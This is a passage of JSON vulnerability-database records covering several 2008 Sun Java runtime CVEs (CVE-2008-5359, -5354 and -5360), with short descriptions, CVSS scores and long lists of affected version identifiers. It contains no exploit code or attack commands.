"cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "Buffer overflow in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 and earlier might allow remote attackers to execute arbitrary code, related to a ConvolveOp operation in the Java AWT library.", "edition": 7, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5359", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5359"], "modified": "2019-10-09T22:56:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.3.1", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.4.2", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5359", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Stack-based buffer overflow in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows locally-launched and possibly remote untrusted Java applications to execute arbitrary code via a JAR file with a long Main-Class manifest entry.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5354", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5354"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5354", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5354", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 and earlier creates temporary files with predictable file names, which allows attackers to write malicious JAR files via unknown vectors.", "edition": 7, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5360", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5360"], "modified": "2019-10-09T22:56:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", 